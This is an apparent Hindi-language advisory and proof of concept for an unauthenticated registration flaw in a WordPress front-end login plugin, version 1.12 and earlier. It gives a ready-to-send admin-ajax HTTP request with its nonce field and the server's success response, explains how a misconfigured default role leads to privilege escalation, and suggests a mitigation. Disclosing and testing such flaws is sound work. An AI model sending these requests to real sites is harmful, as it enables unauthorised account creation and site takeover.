
WordPress PSW Front-end Login & Registration Plugin <= 1.12 में दोषपूर्ण प्रमाणीकरण की कमजोरी है।
यह प्लगइन अपने पंजीकरण तंत्र में एक गंभीर खामी को उजागर करता है।
जबकि यह एक शॉर्टकोड-आधारित फ्रंट-एंड पंजीकरण फॉर्म ([psw_registration]) प्रदान करता है, यह उचित भूमिका प्रतिबंध या सुरक्षित सत्यापन लागू करने में विफल रहता है।
हमलावर इस तंत्र का उपयोग बिना प्रमाणीकरण के खाते बनाने के लिए कर सकते हैं — और यदि साइट का default_role गलत तरीके से कॉन्फ़िगर किया गया है (उदा., administrator पर सेट), तो पूर्ण विशेषाधिकार वृद्धि हो सकती है।
POST /wordpress/wp-admin/admin-ajax.php
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {Host}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Origin: {Host}
Connection: keep-alive
Cookie:
Priority: u=0
first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d
psw_formअनुरोध पास करने के लिए आवश्यक नॉन्स फील्ड है।
यह नॉन्स फ्रंट-एंड पर[psw_registration]शॉर्टकोड से गतिशील रूप से उत्पन्न होता है।
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>
register_user_front_end तक अनधिकृत AJAX पहुंच की अनुमति देता हैdefault_role सेटिंग का सम्मान करता हैadministrator), तो हमलावर को पूर्ण पहुंच मिल जाती हैपंजीकरण फॉर्म को उजागर करने और psw_form के लिए एक वैध नॉन्स उत्पन्न करने के लिए, निम्नलिखित शॉर्टकोड का उपयोग किया जाता है:
[psw_registration]
यह एक पंजीकरण फॉर्म प्रस्तुत करता है जिसमें AJAX कॉल को सफल बनाने के लिए आवश्यक छिपा हुआ नॉन्स फील्ड शामिल होता है।
default_role को एक सुरक्षित मान (जैसे, subscriber) पर मॉनिटर और लॉक करेंयह रिपोर्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
अनुमति के बिना इस कमजोरी का शोषण कानूनी और नैतिक सीमाओं का उल्लंघन कर सकता है।
NXploited (Khaled_Alenazi)